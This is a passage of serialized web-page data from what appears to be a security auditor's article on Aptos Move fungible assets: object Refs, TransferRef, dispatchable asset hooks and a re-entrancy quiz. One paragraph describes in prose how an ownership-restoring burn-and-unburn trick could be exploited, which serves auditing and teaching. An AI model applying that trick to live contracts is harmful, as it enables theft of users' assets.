error",{"type":26,"tag":137,"props":67728,"children":67729},{"style":5590},[67730],{"type":32,"value":6072},{"type":26,"tag":137,"props":67732,"children":67733},{"style":5682},[67734],{"type":32,"value":66419},{"type":26,"tag":137,"props":67736,"children":67737},{"style":5601},[67738],{"type":32,"value":67103},{"type":26,"tag":137,"props":67740,"children":67741},{"class":5559,"line":5878},[67742],{"type":26,"tag":137,"props":67743,"children":67744},{"style":5601},[67745],{"type":32,"value":46256},{"type":26,"tag":137,"props":67747,"children":67748},{"class":5559,"line":5891},[67749],{"type":26,"tag":137,"props":67750,"children":67751},{"style":5601},[67752],{"type":32,"value":64387},{"type":26,"tag":137,"props":67754,"children":67755},{"class":5559,"line":5909},[67756,67760,67764],{"type":26,"tag":137,"props":67757,"children":67758},{"style":5601},[67759],{"type":32,"value":65318},{"type":26,"tag":137,"props":67761,"children":67762},{"style":5590},[67763],{"type":32,"value":12180},{"type":26,"tag":137,"props":67765,"children":67766},{"style":5601},[67767],{"type":32,"value":14363},{"type":26,"tag":137,"props":67769,"children":67770},{"class":5559,"line":5930},[67771],{"type":26,"tag":137,"props":67772,"children":67773},{"style":5601},[67774],{"type":32,"value":64387},{"type":26,"tag":137,"props":67776,"children":67777},{"class":5559,"line":5939},[67778,67782,67786,67790,67794,67799],{"type":26,"tag":137,"props":67779,"children":67780},{"style":5584},[67781],{"type":32,"value":67426},{"type":26,"tag":137,"props":67783,"children":67784},{"style":5590},[67785],{"type":32,"value":470},{"type":26,"tag":137,"props":67787,"children":67788},{"style":5601},[67789],{"type":32,"value":67700},{"type":26,"tag":137,"props":67791,"children":67792},{"style":5590},[67793],{"type":32,"value":289},{"type":26,"tag":137,"props":67795,"children":67796},{"style":5584},[67797],{"type":32,"value":67798}," to",{"type":26,"tag":137,"props":67800,"children":67801},{"style":5601},[67802],{"type":32,"value":5604},{"type":26,"tag":137,"props":67804,"children":67805},{"class":5559,"line":6191},[67806],{"type":26,"tag":137,"props":67807,"children":67808},{"style":5601},[67809],{"type":32,"value":6507},{"type":26,"tag":35,"props":67811,"children":67812},{},[67813,67815,67820,67822,67827],{"type":32,"value":67814},"A user could exploit this by creating an object and a transfer permission, burning the object (changing its ownership to the ",{"type":26,"tag":130,"props":67816,"children":67818},{"className":67817},[],[67819],{"type":32,"value":66472},{"type":32,"value":67821},"), transferring it to another user, and then registering a non-transferable fungible store with that object. While the store could no longer be moved using the owner's ",{"type":26,"tag":130,"props":67823,"children":67825},{"className":67824},[],[67826],{"type":32,"value":9730},{"type":32,"value":67828}," or the transfer permission due to non-transferable restrictions, it could be unburned to restore the original ownership!",{"type":26,"tag":118,"props":67830,"children":67832},{"id":67831},"references",[67833],{"type":32,"value":67834},"References",{"type":26,"tag":35,"props":67836,"children":67837},{},[67838,67843,67845,67851,67853,67858,67860,67865],{"type":26,"tag":130,"props":67839,"children":67841},{"className":67840},[],[67842],{"type":32,"value":67834},{"type":32,"value":67844}," are a permission type resource that authenticate a caller for security-critical operations. ",{"type":26,"tag":130,"props":67846,"children":67848},{"className":67847},[],[67849],{"type":32,"value":67850},"Refs",{"type":32,"value":67852}," are based on the ",{"type":26,"tag":130,"props":67854,"children":67856},{"className":67855},[],[67857],{"type":32,"value":51453},{"type":32,"value":67859}," model, but they are also adapted by fungible assets. Some of these are defined by the ",{"type":26,"tag":130,"props":67861,"children":67863},{"className":67862},[],[67864],{"type":32,"value":51453},{"type":32,"value":67866}," itself, while others are created through the fungible asset module. What's more, some are shared between them, while others appear shared but aren’t.",{"type":26,"tag":35,"props":67868,"children":67869},{},[67870,67872,67877,67879,67884,67885,67891,67893,67898,67900,67905],{"type":32,"value":67871},"Let's get back to the ",{"type":26,"tag":130,"props":67873,"children":67875},{"className":67874},[],[67876],{"type":32,"value":64676},{"type":32,"value":67878}," deletion example. Both ",{"type":26,"tag":130,"props":67880,"children":67882},{"className":67881},[],[67883],{"type":32,"value":65961},{"type":32,"value":3339},{"type":26,"tag":130,"props":67886,"children":67888},{"className":67887},[],[67889],{"type":32,"value":67890},"fungible_asset::remove_store",{"type":32,"value":67892}," use the same object-specific ",{"type":26,"tag":130,"props":67894,"children":67896},{"className":67895},[],[67897],{"type":32,"value":65893},{"type":32,"value":67899}," permission. It can be created only during object creation. There is no separate ",{"type":26,"tag":130,"props":67901,"children":67903},{"className":67902},[],[67904],{"type":32,"value":65893},{"type":32,"value":67906}," for fungible assets.",{"type":26,"tag":5512,"props":67908,"children":67909},{"className":5552,"code":65843,"language":5551,"meta":7,"style":7},[67910],{"type":26,"tag":130,"props":67911,"children":67912},{"__ignoreMap":7},[67913,67920,67959,67966,67973],{"type":26,"tag":137,"props":67914,"children":67915},{"class":5559,"line":5560},[67916],{"type":26,"tag":137,"props":67917,"children":67918},{"style":5564},[67919],{"type":32,"value":65855},{"type":26,"tag":137,"props":67921,"children":67922},{"class":5559,"line":5412},[67923,67927,67931,67935,67939,67943,67947,67951,67955],{"type":26,"tag":137,"props":67924,"children":67925},{"style":5584},[67926],{"type":32,"value":64276},{"type":26,"tag":137,"props":67928,"children":67929},{"style":5584},[67930],{"type":32,"value":8792},{"type":26,"tag":137,"props":67932,"children":67933},{"style":5682},[67934],{"type":32,"value":65871},{"type":26,"tag":137,"props":67936,"children":67937},{"style":5601},[67938],{"type":32,"value":165},{"type":26,"tag":137,"props":67940,"children":67941},{"style":5584},[67942],{"type":32,"value":65880},{"type":26,"tag":137,"props":67944,"children":67945},{"style":5590},[67946],{"type":32,"value":7072},{"type":26,"tag":137,"props":67948,"children":67949},{"style":5590},[67950],{"type":32,"value":9725},{"type":26,"tag":137,"props":67952,"children":67953},{"style":6009},[67954],{"type":32,"value":65893},{"type":26,"tag":137,"props":67956,"children":67957},{"style":5601},[67958],{"type":32,"value":5742},{"type":26,"tag":137,"props":67960,"children":67961},{"class":5559,"line":5417},[67962],{"type":26,"tag":137,"props":67963,"children":67964},{"emptyLinePlaceholder":18},[67965],{"type":32,"value":6276},{"type":26,"tag":137,"props":67967,"children":67968},{"class":5559,"line":5642},[67969],{"type":26,"tag":137,"props":67970,"children":67971},{"style":5564},[67972],{"type":32,"value":65912},{"type":26,"tag":137,"props":67974,"children":67975},{"class":5559,"line":5745},[67976,67980,67984,67988,67992,67996,68000,68004],{"type":26,"tag":137,"props":67977,"children":67978},{"style":5584},[67979],{"type":32,"value":64276},{"type":26,"tag":137,"props":67981,"children":67982},{"style":5584},[67983],{"type":32,"value":8792},{"type":26,"tag":137,"props":67985,"children":67986},{"style":5682},[67987],{"type":32,"value":65928},{"type":26,"tag":137,"props":67989,"children":67990},{"style":5601},[67991],{"type":32,"value":165},{"type":26,"tag":137,"props":67993,"children":67994},{"style":5573},[67995],{"type":32,"value":65937},{"type":26,"tag":137,"props":67997,"children":67998},{"style":5590},[67999],{"type":32,"value":7072},{"type":26,"tag":137,"props":68001,"children":68002},{"style":6009},[68003],{"type":32,"value":65946},{"type":26,"tag":137,"props":68005,"children":68006},{"style":5601},[68007],{"type":32,"value":5742},{"type":26,"tag":35,"props":68009,"children":68010},{},[68011,68013,68018,68020,68026],{"type":32,"value":68012},"On the other hand, the \"frozen\" status of a ",{"type":26,"tag":130,"props":68014,"children":68016},{"className":68015},[],[68017],{"type":32,"value":64676},{"type":32,"value":68019}," is toggled using a ",{"type":26,"tag":130,"props":68021,"children":68023},{"className":68022},[],[68024],{"type":32,"value":68025},"TransferRef",{"type":32,"value":68027},", which is defined in both models (and not interchangeable). They also can be created only during object creation.",{"type":26,"tag":5512,"props":68029,"children":68031},{"className":5552,"code":68030,"language":5551,"meta":7,"style":7},"public fun set_frozen_flag\u003CT: key>(\n    ref: &TransferRef,\n    store: Object\u003CT>,\n    frozen: bool,\n)\n",[68032],{"type":26,"tag":130,"props":68033,"children":68034},{"__ignoreMap":7},[68035,68071,68095,68122,68141],{"type":26,"tag":137,"props":68036,"children":68037},{"class":5559,"line":5560},[68038,68042,68046,68051,68055,68059,68063,68067],{"type":26,"tag":137,"props":68039,"children":68040},{"style":5584},[68041],{"type":32,"value":64276},{"type":26,"tag":137,"props":68043,"children":68044},{"style":5584},[68045],{"type":32,"value":8792},{"type":26,"tag":137,"props":68047,"children":68048},{"style":5584},[68049],{"type":32,"value":68050}," set_frozen_flag",{"type":26,"tag":137,"props":68052,"children":68053},{"style":5601},[68054],{"type":32,"value":8391},{"type":26,"tag":137,"props":68056,"children":68057},{"style":6009},[68058],{"type":32,"value":2064},{"type":26,"tag":137,"props":68060,"children":68061},{"style":5590},[68062],{"type":32,"value":7072},{"type":26,"tag":137,"props":68064,"children":68065},{"style":5584},[68066],{"type":32,"value":8517},{"type":26,"tag":137,"props":68068,"children":68069},{"style":5601},[68070],{"type":32,"value":9172},{"type":26,"tag":137,"props":68072,"children":68073},{"class":5559,"line":5412},[68074,68079,68083,68087,68091],{"type":26,"tag":137,"props":68075,"children":68076},{"style":5573},[68077],{"type":32,"value":68078},"    ref",{"type":26,"tag":137,"props":68080,"children":68081},{"style":5590},[68082],{"type":32,"value":7072},{"type":26,"tag":137,"props":68084,"children":68085},{"style":5590},[68086],{"type":32,"value":9725},{"type":26,"tag":137,"props":68088,"children":68089},{"style":6009},[68090],{"type":32,"value":68025},{"type":26,"tag":137,"props":68092,"children":68093},{"style":5601},[68094],{"type":32,"value":6099},{"type":26,"tag":137,"props":68096,"children":68097},{"class":5559,"line":5417},[68098,68102,68106,68110,68114,68118],{"type":26,"tag":137,"props":68099,"children":68100},{"style":5584},[68101],{"type":32,"value":32008},{"type":26,"tag":137,"props":68103,"children":68104},{"style":5590},[68105],{"type":32,"value":7072},{"type":26,"tag":137,"props":68107,"children":68108},{"style":6009},[68109],{"type":32,"value":64162},{"type":26,"tag":137,"props":68111,"children":68112},{"style":5601},[68113],{"type":32,"value":8391},{"type":26,"tag":137,"props":68115,"children":68116},{"style":6009},[68117],{"type":32,"value":2064},{"type":26,"tag":137,"props":68119,"children":68120},{"style":5601},[68121],{"type":32,"value":8723},{"type":26,"tag":137,"props":68123,"children":68124},{"class":5559,"line":5642},[68125,68129,68133,68137],{"type":26,"tag":137,"props":68126,"children":68127},{"style":5584},[68128],{"type":32,"value":63814},{"type":26,"tag":137,"props":68130,"children":68131},{"style":5590},[68132],{"type":32,"value":7072},{"type":26,"tag":137,"props":68134,"children":68135},{"style":6009},[68136],{"type":32,"value":14641},{"type":26,"tag":137,"props":68138,"children":68139},{"style":5601},[68140],{"type":32,"value":6099},{"type":26,"tag":137,"props":68142,"children":68143},{"class":5559,"line":5745},[68144],{"type":26,"tag":137,"props":68145,"children":68146},{"style":5601},[68147],{"type":32,"value":5742},{"type":26,"tag":35,"props":68149,"children":68150},{},[68151,68152,68157,68158,68163],{"type":32,"value":19206},{"type":26,"tag":130,"props":68153,"children":68155},{"className":68154},[],[68156],{"type":32,"value":51453},{"type":32,"value":1011},{"type":26,"tag":130,"props":68159,"children":68161},{"className":68160},[],[68162],{"type":32,"value":68025},{"type":32,"value":68164}," is used to transfer object ownership:",{"type":26,"tag":5512,"props":68166,"children":68168},{"className":5552,"code":68167,"language":5551,"meta":7,"style":7},"/// Used to create LinearTransferRef, hence ownership transfer.\nstruct TransferRef has drop, store {\n    self: address,\n}\n",[68169],{"type":26,"tag":130,"props":68170,"children":68171},{"__ignoreMap":7},[68172,68180,68213,68232],{"type":26,"tag":137,"props":68173,"children":68174},{"class":5559,"line":5560},[68175],{"type":26,"tag":137,"props":68176,"children":68177},{"style":5564},[68178],{"type":32,"value":68179},"/// Used to create LinearTransferRef, hence ownership transfer.\n",{"type":26,"tag":137,"props":68181,"children":68182},{"class":5559,"line":5412},[68183,68187,68192,68196,68201,68205,68209],{"type":26,"tag":137,"props":68184,"children":68185},{"style":5573},[68186],{"type":32,"value":11990},{"type":26,"tag":137,"props":68188,"children":68189},{"style":6009},[68190],{"type":32,"value":68191}," TransferRef",{"type":26,"tag":137,"props":68193,"children":68194},{"style":5584},[68195],{"type":32,"value":11999},{"type":26,"tag":137,"props":68197,"children":68198},{"style":5584},[68199],{"type":32,"value":68200}," drop",{"type":26,"tag":137,"props":68202,"children":68203},{"style":5601},[68204],{"type":32,"value":1108},{"type":26,"tag":137,"props":68206,"children":68207},{"style":5584},[68208],{"type":32,"value":8526},{"type":26,"tag":137,"props":68210,"children":68211},{"style":5601},[68212],{"type":32,"value":5875},{"type":26,"tag":137,"props":68214,"children":68215},{"class":5559,"line":5417},[68216,68220,68224,68228],{"type":26,"tag":137,"props":68217,"children":68218},{"style":5573},[68219],{"type":32,"value":23379},{"type":26,"tag":137,"props":68221,"children":68222},{"style":5590},[68223],{"type":32,"value":7072},{"type":26,"tag":137,"props":68225,"children":68226},{"style":5584},[68227],{"type":32,"value":8835},{"type":26,"tag":137,"props":68229,"children":68230},{"style":5601},[68231],{"type":32,"value":6099},{"type":26,"tag":137,"props":68233,"children":68234},{"class":5559,"line":5642},[68235],{"type":26,"tag":137,"props":68236,"children":68237},{"style":5601},[68238],{"type":32,"value":6507},{"type":26,"tag":35,"props":68240,"children":68241},{},[68242,68244,68249],{"type":32,"value":68243},"While the fungible asset's ",{"type":26,"tag":130,"props":68245,"children":68247},{"className":68246},[],[68248],{"type":32,"value":68025},{"type":32,"value":68250}," manages the transfer of fungible assets and the (un)freezing of fungible stores:",{"type":26,"tag":5512,"props":68252,"children":68254},{"className":5552,"code":68253,"language":5551,"meta":7,"style":7},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n/// and allow the holder of TransferRef to transfer fungible assets from any account.\nstruct TransferRef has drop, store {\n    metadata: Object\u003CMetadata>\n}\n",[68255],{"type":26,"tag":130,"props":68256,"children":68257},{"__ignoreMap":7},[68258,68266,68274,68305,68332],{"type":26,"tag":137,"props":68259,"children":68260},{"class":5559,"line":5560},[68261],{"type":26,"tag":137,"props":68262,"children":68263},{"style":5564},[68264],{"type":32,"value":68265},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n",{"type":26,"tag":137,"props":68267,"children":68268},{"class":5559,"line":5412},[68269],{"type":26,"tag":137,"props":68270,"children":68271},{"style":5564},[68272],{"type":32,"value":68273},"/// and allow the holder of TransferRef to transfer fungible assets from any account.\n",{"type":26,"tag":137,"props":68275,"children":68276},{"class":5559,"line":5417},[68277,68281,68285,68289,68293,68297,68301],{"type":26,"tag":137,"props":68278,"children":68279},{"style":5573},[68280],{"type":32,"value":11990},{"type":26,"tag":137,"props":68282,"children":68283},{"style":6009},[68284],{"type":32,"value":68191},{"type":26,"tag":137,"props":68286,"children":68287},{"style":5584},[68288],{"type":32,"value":11999},{"type":26,"tag":137,"props":68290,"children":68291},{"style":5584},[68292],{"type":32,"value":68200},{"type":26,"tag":137,"props":68294,"children":68295},{"style":5601},[68296],{"type":32,"value":1108},{"type":26,"tag":137,"props":68298,"children":68299},{"style":5584},[68300],{"type":32,"value":8526},{"type":26,"tag":137,"props":68302,"children":68303},{"style":5601},[68304],{"type":32,"value":5875},{"type":26,"tag":137,"props":68306,"children":68307},{"class":5559,"line":5642},[68308,68312,68316,68320,68324,68328],{"type":26,"tag":137,"props":68309,"children":68310},{"style":5584},[68311],{"type":32,"value":64153},{"type":26,"tag":137,"props":68313,"children":68314},{"style":5590},[68315],{"type":32,"value":7072},{"type":26,"tag":137,"props":68317,"children":68318},{"style":6009},[68319],{"type":32,"value":64162},{"type":26,"tag":137,"props":68321,"children":68322},{"style":5601},[68323],{"type":32,"value":8391},{"type":26,"tag":137,"props":68325,"children":68326},{"style":6009},[68327],{"type":32,"value":64171},{"type":26,"tag":137,"props":68329,"children":68330},{"style":5601},[68331],{"type":32,"value":8577},{"type":26,"tag":137,"props":68333,"children":68334},{"class":5559,"line":5745},[68335],{"type":26,"tag":137,"props":68336,"children":68337},{"style":5601},[68338],{"type":32,"value":6507},{"type":26,"tag":35,"props":68340,"children":68341},{},[68342,68344,68350,68352,68358],{"type":32,"value":68343},"Additionally, there are fungible asset-specific references such as ",{"type":26,"tag":130,"props":68345,"children":68347},{"className":68346},[],[68348],{"type":32,"value":68349},"MintRef",{"type":32,"value":68351}," for minting and ",{"type":26,"tag":130,"props":68353,"children":68355},{"className":68354},[],[68356],{"type":32,"value":68357},"BurnRef",{"type":32,"value":68359}," for burning. These references are used exclusively by the fungible asset model, but they still must be created when the fungible asset object is initialized.",{"type":26,"tag":92,"props":68361,"children":68363},{"id":68362},"dispatchable-fungible-assets",[68364],{"type":32,"value":68365},"Dispatchable fungible assets",{"type":26,"tag":35,"props":68367,"children":68368},{},[68369],{"type":32,"value":68370},"Dispatchable fungible assets enhance the functionality of fungible assets by enabling the overloading of operations like deposits and withdrawals.",{"type":26,"tag":35,"props":68372,"children":68373},{},[68374],{"type":32,"value":68375},"Hooks registered during the creation of a dispatchable fungible asset override the default logic for these operations, allowing for custom features like access control, fee mechanisms, or granular pausing.",{"type":26,"tag":68377,"props":68378,"children":68379},"warning",{},[68380],{"type":26,"tag":35,"props":68381,"children":68382},{},[68383,68385,68391],{"type":32,"value":68384},"Overloading the core fungible asset functions introduces potential security risks; for example, during a deposit, funds may not end up at the intended address. The dispatchable fungible asset API provides functions like ",{"type":26,"tag":130,"props":68386,"children":68388},{"className":68387},[],[68389],{"type":32,"value":68390},"transfer_assert_minimum_deposit",{"type":32,"value":68392}," that can help mitigate such risks.",{"type":26,"tag":35,"props":68394,"children":68395},{},[68396,68398,68403,68405,68412],{"type":32,"value":68397},"Hook functions for dispatchable fungible assets must have the correct type signature. They must also be declared ",{"type":26,"tag":130,"props":68399,"children":68401},{"className":68400},[],[68402],{"type":32,"value":64276},{"type":32,"value":68404}," to ensure ",{"type":26,"tag":41,"props":68406,"children":68409},{"href":68407,"rel":68408},"https://aptos.dev/en/build/smart-contracts/book/package-upgrades#compatibility-rules",[45],[68410],{"type":32,"value":68411},"their signature remains immutable",{"type":32,"value":68413},". An example implementation might look like this:",{"type":26,"tag":5512,"props":68415,"children":68417},{"className":5552,"code":68416,"language":5551,"meta":7,"style":7},"public fun withdraw_hook\u003CT: key>(\n    store: Object\u003CT>,\n    amount: u64,\n    transfer_ref: &TransferRef,\n): FungibleAsset {\n    //check paused, gather fees etc.\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n\npublic fun deposit_hook\u003CT: key>(\n    store: Object\u003CT>,\n    fa: FungibleAsset,\n    transfer_ref: &TransferRef,\n) {\n    //check paused, gather fees etc.\n    fungible_asset::deposit_with_ref(transfer_ref, store, fa);\n}\n",[68418],{"type":26,"tag":130,"props":68419,"children":68420},{"__ignoreMap":7},[68421,68457,68484,68503,68527,68546,68554,68600,68607,68614,68650,68677,68697,68720,68727,68734,68778],{"type":26,"tag":137,"props":68422,"children":68423},{"class":5559,"line":5560},[68424,68428,68432,68437,68441,68445,68449,68453],{"type":26,"tag":137,"props":68425,"children":68426},{"style":5584},[68427],{"type":32,"value":64276},{"type":26,"tag":137,"props":68429,"children":68430},{"style":5584},[68431],{"type":32,"value":8792},{"type":26,"tag":137,"props":68433,"children":68434},{"style":5584},[68435],{"type":32,"value":68436}," withdraw_hook",{"type":26,"tag":137,"props":68438,"children":68439},{"style":5601},[68440],{"type":32,"value":8391},{"type":26,"tag":137,"props":68442,"children":68443},{"style":6009},[68444],{"type":32,"value":2064},{"type":26,"tag":137,"props":68446,"children":68447},{"style":5590},[68448],{"type":32,"value":7072},{"type":26,"tag":137,"props":68450,"children":68451},{"style":5584},[68452],{"type":32,"value":8517},{"type":26,"tag":137,"props":68454,"children":68455},{"style":5601},[68456],{"type":32,"value":9172},{"type":26,"tag":137,"props":68458,"children":68459},{"class":5559,"line":5412},[68460,68464,68468,68472,68476,68480],{"type":26,"tag":137,"props":68461,"children":68462},{"style":5584},[68463],{"type":32,"value":32008},{"type":26,"tag":137,"props":68465,"children":68466},{"style":5590},[68467],{"type":32,"value":7072},{"type":26,"tag":137,"props":68469,"children":68470},{"style":6009},[68471],{"type":32,"value":64162},{"type":26,"tag":137,"props":68473,"children":68474},{"style":5601},[68475],{"type":32,"value":8391},{"type":26,"tag":137,"props":68477,"children":68478},{"style":6009},[68479],{"type":32,"value":2064},{"type":26,"tag":137,"props":68481,"children":68482},{"style":5601},[68483],{"type":32,"value":8723},{"type":26,"tag":137,"props":68485,"children":68486},{"class":5559,"line":5417},[68487,68491,68495,68499],{"type":26,"tag":137,"props":68488,"children":68489},{"style":5584},[68490],{"type":32,"value":64183},{"type":26,"tag":137,"props":68492,"children":68493},{"style":5590},[68494],{"type":32,"value":7072},{"type":26,"tag":137,"props":68496,"children":68497},{"style":6009},[68498],{"type":32,"value":8445},{"type":26,"tag":137,"props":68500,"children":68501},{"style":5601},[68502],{"type":32,"value":6099},{"type":26,"tag":137,"props":68504,"children":68505},{"class":5559,"line":5642},[68506,68511,68515,68519,68523],{"type":26,"tag":137,"props":68507,"children":68508},{"style":5584},[68509],{"type":32,"value":68510},"    transfer_ref",{"type":26,"tag":137,"props":68512,"children":68513},{"style":5590},[68514],{"type":32,"value":7072},{"type":26,"tag":137,"props":68516,"children":68517},{"style":5590},[68518],{"type":32,"value":9725},{"type":26,"tag":137,"props":68520,"children":68521},{"style":6009},[68522],{"type":32,"value":68025},{"type":26,"tag":137,"props":68524,"children":68525},{"style":5601},[68526],{"type":32,"value":6099},{"type":26,"tag":137,"props":68528,"children":68529},{"class":5559,"line":5745},[68530,68534,68538,68542],{"type":26,"tag":137,"props":68531,"children":68532},{"style":5601},[68533],{"type":32,"value":200},{"type":26,"tag":137,"props":68535,"children":68536},{"style":5590},[68537],{"type":32,"value":7072},{"type":26,"tag":137,"props":68539,"children":68540},{"style":6009},[68541],{"type":32,"value":64141},{"type":26,"tag":137,"props":68543,"children":68544},{"style":5601},[68545],{"type":32,"value":5875},{"type":26,"tag":137,"props":68547,"children":68548},{"class":5559,"line":5850},[68549],{"type":26,"tag":137,"props":68550,"children":68551},{"style":5564},[68552],{"type":32,"value":68553},"    //check paused, gather fees etc.\n",{"type":26,"tag":137,"props":68555,"children":68556},{"class":5559,"line":5878},[68557,68562,68566,68571,68575,68580,68584,68588,68592,68596],{"type":26,"tag":137,"props":68558,"children":68559},{"style":5601},[68560],{"type":32,"value":68561},"    fungible_asset",{"type":26,"tag":137,"props":68563,"children":68564},{"style":5590},[68565],{"type":32,"value":6072},{"type":26,"tag":137,"props":68567,"children":68568},{"style":5682},[68569],{"type":32,"value":68570},"withdraw_with_ref",{"type":26,"tag":137,"props":68572,"children":68573},{"style":5601},[68574],{"type":32,"value":165},{"type":26,"tag":137,"props":68576,"children":68577},{"style":5584},[68578],{"type":32,"value":68579},"transfer_ref",{"type":26,"tag":137,"props":68581,"children":68582},{"style":5601},[68583],{"type":32,"value":1108},{"type":26,"tag":137,"props":68585,"children":68586},{"style":5584},[68587],{"type":32,"value":8526},{"type":26,"tag":137,"props":68589,"children":68590},{"style":5601},[68591],{"type":32,"value":1108},{"type":26,"tag":137,"props":68593,"children":68594},{"style":5584},[68595],{"type":32,"value":22900},{"type":26,"tag":137,"props":68597,"children":68598},{"style":5601},[68599],{"type":32,"value":5742},{"type":26,"tag":137,"props":68601,"children":68602},{"class":5559,"line":5891},[68603],{"type":26,"tag":137,"props":68604,"children":68605},{"style":5601},[68606],{"type":32,"value":6507},{"type":26,"tag":137,"props":68608,"children":68609},{"class":5559,"line":5909},[68610],{"type":26,"tag":137,"props":68611,"children":68612},{"emptyLinePlaceholder":18},[68613],{"type":32,"value":6276},{"type":26,"tag":137,"props":68615,"children":68616},{"class":5559,"line":5930},[68617,68621,68625,68630,68634,68638,68642,68646],{"type":26,"tag":137,"props":68618,"children":68619},{"style":5584},[68620],{"type":32,"value":64276},{"type":26,"tag":137,"props":68622,"children":68623},{"style":5584},[68624],{"type":32,"value":8792},{"type":26,"tag":137,"props":68626,"children":68627},{"style":5584},[68628],{"type":32,"value":68629}," deposit_hook",{"type":26,"tag":137,"props":68631,"children":68632},{"style":5601},[68633],{"type":32,"value":8391},{"type":26,"tag":137,"props":68635,"children":68636},{"style":6009},[68637],{"type":32,"value":2064},{"type":26,"tag":137,"props":68639,"children":68640},{"style":5590},[68641],{"type":32,"value":7072},{"type":26,"tag":137,"props":68643,"children":68644},{"style":5584},[68645],{"type":32,"value":8517},{"type":26,"tag":137,"props":68647,"children":68648},{"style":5601},[68649],{"type":32,"value":9172},{"type":26,"tag":137,"props":68651,"children":68652},{"class":5559,"line":5939},[68653,68657,68661,68665,68669,68673],{"type":26,"tag":137,"props":68654,"children":68655},{"style":5584},[68656],{"type":32,"value":32008},{"type":26,"tag":137,"props":68658,"children":68659},{"style":5590},[68660],{"type":32,"value":7072},{"type":26,"tag":137,"props":68662,"children":68663},{"style":6009},[68664],{"type":32,"value":64162},{"type":26,"tag":137,"props":68666,"children":68667},{"style":5601},[68668],{"type":32,"value":8391},{"type":26,"tag":137,"props":68670,"children":68671},{"style":6009},[68672],{"type":32,"value":2064},{"type":26,"tag":137,"props":68674,"children":68675},{"style":5601},[68676],{"type":32,"value":8723},{"type":26,"tag":137,"props":68678,"children":68679},{"class":5559,"line":6191},[68680,68685,68689,68693],{"type":26,"tag":137,"props":68681,"children":68682},{"style":5584},[68683],{"type":32,"value":68684},"    fa",{"type":26,"tag":137,"props":68686,"children":68687},{"style":5590},[68688],{"type":32,"value":7072},{"type":26,"tag":137,"props":68690,"children":68691},{"style":6009},[68692],{"type":32,"value":64141},{"type":26,"tag":137,"props":68694,"children":68695},{"style":5601},[68696],{"type":32,"value":6099},{"type":26,"tag":137,"props":68698,"children":68699},{"class":5559,"line":6208},[68700,68704,68708,68712,68716],{"type":26,"tag":137,"props":68701,"children":68702},{"style":5584},[68703],{"type":32,"value":68510},{"type":26,"tag":137,"props":68705,"children":68706},{"style":5590},[68707],{"type":32,"value":7072},{"type":26,"tag":137,"props":68709,"children":68710},{"style":5590},[68711],{"type":32,"value":9725},{"type":26,"tag":137,"props":68713,"children":68714},{"style":6009},[68715],{"type":32,"value":68025},{"type":26,"tag":137,"props":68717,"children":68718},{"style":5601},[68719],{"type":32,"value":6099},{"type":26,"tag":137,"props":68721,"children":68722},{"class":5559,"line":6225},[68723],{"type":26,"tag":137,"props":68724,"children":68725},{"style":5601},[68726],{"type":32,"value":17395},{"type":26,"tag":137,"props":68728,"children":68729},{"class":5559,"line":6238},[68730],{"type":26,"tag":137,"props":68731,"children":68732},{"style":5564},[68733],{"type":32,"value":68553},{"type":26,"tag":137,"props":68735,"children":68736},{"class":5559,"line":6247},[68737,68741,68745,68750,68754,68758,68762,68766,68770,68774],{"type":26,"tag":137,"props":68738,"children":68739},{"style":5601},[68740],{"type":32,"value":68561},{"type":26,"tag":137,"props":68742,"children":68743},{"style":5590},[68744],{"type":32,"value":6072},{"type":26,"tag":137,"props":68746,"children":68747},{"style":5682},[68748],{"type":32,"value":68749},"deposit_with_ref",{"type":26,"tag":137,"props":68751,"children":68752},{"style":5601},[68753],{"type":32,"value":165},{"type":26,"tag":137,"props":68755,"children":68756},{"style":5584},[68757],{"type":32,"value":68579},{"type":26,"tag":137,"props":68759,"children":68760},{"style":5601},[68761],{"type":32,"value":1108},{"type":26,"tag":137,"props":68763,"children":68764},{"style":5584},[68765],{"type":32,"value":8526},{"type":26,"tag":137,"props":68767,"children":68768},{"style":5601},[68769],{"type":32,"value":1108},{"type":26,"tag":137,"props":68771,"children":68772},{"style":5584},[68773],{"type":32,"value":64334},{"type":26,"tag":137,"props":68775,"children":68776},{"style":5601},[68777],{"type":32,"value":6430},{"type":26,"tag":137,"props":68779,"children":68780},{"class":5559,"line":6270},[68781],{"type":26,"tag":137,"props":68782,"children":68783},{"style":5601},[68784],{"type":32,"value":6507},{"type":26,"tag":68786,"props":68787,"children":68788},"question",{},[68789,68816],{"type":26,"tag":35,"props":68790,"children":68791},{},[68792,68794,68800,68802,68808,68809,68815],{"type":32,"value":68793},"Why hook functions rely on ",{"type":26,"tag":130,"props":68795,"children":68797},{"className":68796},[],[68798],{"type":32,"value":68799},"*_with_ref",{"type":32,"value":68801}," calls? What would happen if the hook function called ",{"type":26,"tag":130,"props":68803,"children":68805},{"className":68804},[],[68806],{"type":32,"value":68807},"dispatchable_fungible_asset::withdraw",{"type":32,"value":19386},{"type":26,"tag":130,"props":68810,"children":68812},{"className":68811},[],[68813],{"type":32,"value":68814},"fungible_asset::withdraw_with_ref",{"type":32,"value":5737},{"type":26,"tag":68817,"props":68818,"children":68819},"template",{"v-slot:answer-0":7},[68820,68832],{"type":26,"tag":35,"props":68821,"children":68822},{},[68823,68825,68830],{"type":32,"value":68824},"A1: Hook functions rely on ",{"type":26,"tag":130,"props":68826,"children":68828},{"className":68827},[],[68829],{"type":32,"value":68799},{"type":32,"value":68831}," calls because the default fungible asset functions verify if the fungible asset is not dispatchable.",{"type":26,"tag":35,"props":68833,"children":68834},{},[68835,68837,68842],{"type":32,"value":68836},"A2: A ",{"type":26,"tag":130,"props":68838,"children":68840},{"className":68839},[],[68841],{"type":32,"value":68807},{"type":32,"value":68843}," would result in RUNTIME_DISPATCH_ERROR (code 4037) error with error message: \"Re-entrancy detected\".",{"type":26,"tag":35,"props":68845,"children":68846},{},[68847],{"type":32,"value":68848},"In one of our reviews, we encountered a dispatchable fungible asset where the hooked withdrawal set a \"blocked\" flag, which was cleared by the corresponding deposit. This design was used to ensure that each withdrawal was tied to a deposit, effectively preventing simultaneous withdrawals.",{"type":26,"tag":5512,"props":68850,"children":68852},{"className":5552,"code":68851,"language":5551,"meta":7,"style":7},"public fun deposit\u003CT: key>(store: Object\u003CT>, fa: FungibleAsset, transfer_ref: &TransferRef) {\n    assert_withdraw_flag(true);\n    [...]\n    set_withdraw_flag(false);\n    fungible_asset::deposit_with_ref(transfer_ref, store, amount);\n    [...]\n    }\n\npublic fun 